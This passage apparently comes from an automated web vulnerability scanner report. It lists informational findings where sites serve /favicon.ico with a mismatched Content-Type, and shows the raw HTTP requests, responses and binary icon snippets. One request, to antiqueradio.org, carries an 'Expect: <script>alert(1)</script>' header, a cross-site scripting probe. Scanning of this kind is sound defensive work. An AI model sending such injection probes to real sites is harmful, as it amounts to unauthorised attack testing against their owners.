Connection: keep-alive

............ .h.......(....... ..... .............................v.umv.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u\v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.s.
...[SNIP]...

31.21. http://www.amasci.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.amasci.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.amasci.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 20:32:33 GMT
Server: Apache/1.3.34 (Unix) mod_layout/3.3
Last-Modified: Sun, 08 Jul 2007 21:49:46 GMT
ETag: "fa703f2-13e-46915bfa"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain

..............(.......(....... ........................................ss..^^.uuu.........
Ux...+.........-n............................ ...... UU{.....V..[9..UZ...5. Uk.w.3..V.......V3"..#..V3+.x...V
...[SNIP]...

31.22. http://www.americanmedical-id.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.americanmedical-id.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanmedical-id.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:27 GMT
Server: Apache
Last-Modified: Wed, 22 Dec 2004 18:21:36 GMT
Accept-Ranges: bytes
Content-Length: 5494
Content-Type: text/plain; charset=iso-8859-1

...... ..........&... ..............(... ...@...............................................................................WW................GG..............KK......LL..dd..........bb.. ......JJ
...[SNIP]...

31.23. http://www.antiqueradio.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.antiqueradio.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.antiqueradio.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:54:05 GMT
Server: Rapidsite/Apa/1.3.33 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.22 OpenSSL/0.9.8d
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20

HTTP Error Code 417"

31.24. http://www.arnottindustries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.arnottindustries.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.25. http://www.asianmovielola.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.asianmovielola.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asianmovielola.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:46 GMT
Server: Apache
Last-Modified: Tue, 16 Mar 2010 15:19:30 GMT
ETag: "e7cc7d-37e-8629e480"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.26. http://www.auntbugs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.auntbugs.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.auntbugs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Sep 2009 19:52:17 GMT
ETag: "15080ee-9f6-473b73c6f9e40"
Accept-Ranges: bytes
Content-Length: 2550
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.27. http://www.autozonepro.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autozonepro.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozonepro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.28. http://www.avidpromedical.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.avidpromedical.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.avidpromedical.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:33 GMT
Server: Apache/2.2.3 (Fedora)
Last-Modified: Thu, 29 Jan 2009 02:07:08 GMT
ETag: "8814004-9f6-461958ba96b00"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.29. http://www.bankserv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bankserv.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bankserv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:19 GMT
Server: Apache
Last-Modified: Thu, 09 Apr 2009 20:53:07 GMT
ETag: "63d5b-12ee-6f6232c0"
Accept-Ranges: bytes
Content-Length: 4846
Connection: close
Content-Type: text/plain; charset=UTF-8

..................6...........H............. .. ..f ..(.......0................................H .....P`...........X....h......pX......Pp..........X0......h............................................
...[SNIP]...

31.30. http://www.bcpl.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bcpl.info
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bcpl.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:13 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.31. http://www.best-running-tips.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.best-running-tips.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.best-running-tips.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:08 GMT
Server: Apache
Last-Modified: Sat, 31 Mar 2007 03:55:48 GMT
ETag: "8f084f-e36-42cf0f69b7900"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...

31.32. http://www.bigagnes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bigagnes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigagnes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:23:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 03 Feb 2009 12:56:06 GMT
ETag: "14a8124-47e-31c10580"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................`eV..2...2...2...2...eV.....`............................XH..2...2...2...2...2...2...2...2...XH......................>,
...[SNIP]...

31.33. http://www.bigorrin.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bigorrin.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigorrin.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.34. http://www.blackgold.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.blackgold.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackgold.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.35. http://www.blogxilla.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.blogxilla.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogxilla.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:00:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.36. http://www.bloxnine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bloxnine.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.37. http://www.booksshouldbefree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.booksshouldbefree.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booksshouldbefree.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:24 GMT
Server: Apache
Last-Modified: Mon, 20 Sep 2010 05:28:36 GMT
ETag: "8040eaa-10be-490aa2f1b4900"
Accept-Ranges: bytes
Content-Length: 4286
Cache-Control: public, max-age=7776000
Connection: close
Content-Type: text/plain

...... .... .........(... ...@..... .........N...N...............................................................?2.ZXI+.A1.G..........................................................................
...[SNIP]...

31.38. http://www.breastfeeding.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.breastfeeding.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.breastfeeding.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:28 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Sat, 21 Feb 2009 01:09:59 GMT
ETag: "57dac-47e-463636da0a7c0"
Accept-Ranges: bytes
Content-Length: 1150
Cneonction: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...
...[SNIP]...

31.39. http://www.broadbandsports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.broadbandsports.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.broadbandsports.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:33 GMT
Server: Apache/2.2.3 (Fedora)
Last-Modified: Tue, 20 May 2008 19:16:51 GMT
ETag: "52a85a7-47e-5285eec0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=29030400
Expires: Tue, 03 Apr 2012 10:59:33 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.40. http://www.brunswick.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.brunswick.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brunswick.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:05 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Wed, 19 Mar 2008 16:07:38 GMT
ETag: "ab045a4-47e-73aba680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..........................................................................X...X.,.X.k.X.<.........................................X.$.X.`.X...X.m.X.;.X............
...[SNIP]...

31.41. http://www.cabinsusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cabinsusa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabinsusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:39 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Fri, 04 Dec 2009 21:08:35 GMT
ETag: "e9423c-57d6-82c4fac0"
Accept-Ranges: bytes
Content-Length: 22486
Content-Type: text/plain

..............h...f......... .h....... ..........6
.. .... .........00...........#..00.... ..%...2..(....... ..............................................................................!.
./...:"
...[SNIP]...

31.42. http://www.careersandcolleges.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.careersandcolleges.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.careersandcolleges.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:11 GMT
Server: Apache/2.0.52 (Oracle)
Last-Modified: Wed, 31 May 2006 19:03:47 GMT
ETag: "ec0b9-57e-360d0ac0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...................................aaa.rrr.................qqq.........bbb.~~~.~~}.jjj.kkk.www.....eee....................................................
...[SNIP]...

31.43. http://www.carsondellosa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.carsondellosa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.44. http://www.cash-advances-in-1-hour.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cash-advances-in-1-hour.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cash-advances-in-1-hour.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Aug 2010 18:24:10 GMT
ETag: "9e4db-57e-49d3c680"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...............................{...e.......;z..N....w..k...V......./...I...X~..k...j...3..."...Fr..U...I...a...A...K|..Tv..3...[...q...)...p...D...P...<...Cy
...[SNIP]...

31.45. http://www.cashstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cashstore.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cashstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 04:28:52 GMT
ETag: "1224014-9f6-49304d8b90900"
Accept-Ranges: bytes
Content-Length: 2550
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:19:22 GMT
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.46. http://www.cayenne.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cayenne.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cayenne.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 20 Jul 2010 17:35:01 GMT
ETag: "fe8d61-47e-48bd51ad05b40"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 11:22:49 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................6_..Q...................................................=...
..
..Q...X...=.................................
...[SNIP]...

31.47. http://www.ccnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ccnow.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ccnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:28 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 21 Apr 2011 17:59:59 GMT
ETag: "2fe-4db0709f"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...

31.48. http://www.churchleaderinsights.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.churchleaderinsights.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchleaderinsights.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:30 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 13:36:27 GMT
ETag: "1acd16b-47e-4a0e1031a8cc0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.49. http://www.cirruscasino.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cirruscasino.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cirruscasino.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:59 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 23:41:30 GMT
ETag: "c4980ec-e36-485548ca1be80"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

..............h...&... ..............(....... ...........@...........................-...UII.....`....Xl..}z......,/.@t{.....X.......kgf..........u...... ...!JY.....k....BN.O...7=<.2...f...2........&
...[SNIP]...

31.50. http://www.cityofheroes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cityofheroes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cityofheroes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.51. http://www.classicwordgames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.classicwordgames.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.classicwordgames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:48 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 12:38:43 GMT
ETag: "56f29-57e-4904b9c1dfac0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................lt....2...........q.........t}..{.............q...................Q.......................................................................
...[SNIP]...

31.52. http://www.clevelandcountyschools.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.clevelandcountyschools.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clevelandcountyschools.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Nov 2010 15:33:01 GMT
ETag: "b1914c-1636-4948c56e4a540"
Accept-Ranges: bytes
Content-Length: 5686
Content-Type: text/plain; charset=UTF-8

..............h...&... .... .........(....... ...............................- ..1*..5...:3..MG..]X..wr...N...N...P...j+..r6..U@..H..~....M...r...y...|...............................................
...[SNIP]...

31.53. http://www.clevelandgolf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.clevelandgolf.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clevelandgolf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:31 GMT
Server: Apache
Last-Modified: Tue, 27 Sep 2005 17:19:55 GMT
ETag: "9280a0-47e-401c415a204c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................................2..02..p2...2...2..0....................................2..02...2...2...2...2...2...2...2..0......................
...[SNIP]...

31.54. http://www.collegeotr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.collegeotr.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeotr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:42 GMT
Server: Apache/2.2.3 (CentOS)
